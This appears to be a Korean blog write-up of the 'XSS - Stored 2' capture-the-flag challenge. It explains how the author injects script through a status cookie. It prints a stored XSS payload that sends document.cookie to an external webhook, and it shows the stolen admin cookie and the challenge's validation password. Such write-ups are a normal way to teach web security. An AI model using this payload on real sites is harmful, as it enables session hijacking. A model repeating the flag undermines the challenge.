Post

XSS - Stored 2

XSS - Stored 2

1
2
3
4
5
Author
g0uZ,  4 March 2012

Statement
Steal the administrator session’s cookie and go in the admin section.

Stored1 과 동일하게 진행. 하지만 javascript를 htmlentities 함수를 이용한 것인지 실행시키지 못하도록 해놓았음.
그래서 title, section 쿼리, cookie 등 다 시도해본 결과 쿠키 쪽에서 가능했음.
message를 보내면 status를 표시해주는데 status 쿠키 값을 다음과 같이 변경.

1
2
3
Status : <i class="invite">invite</i> 이고 자바스크립트를 실행시키려면 "으로 닫아 줘야 됨. 따라서 아래와 같이 변경해줘야 함.

"><script>location.href="webhook_url?cookie="%2B document.cookie</script>

한 5분 후에 확인해보면 이렇게 나옴.

1
2
3
webhook_url?cookie=status%3Dinvite%3B%20ADMIN_COOKIE%3DSY2USDIH78TF3DFU78546TE7F

status=invite; ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7F

따라서 문제로 돌아가서 쿠키 값을 설정시켜주고 admin 섹션으로 가면 flag를 얻을 수 있음.

1
You can validate challenge with this pass : E5HKEGyCXQVsYaehaqeJs0AfV
This post is licensed under CC BY 4.0 by the author.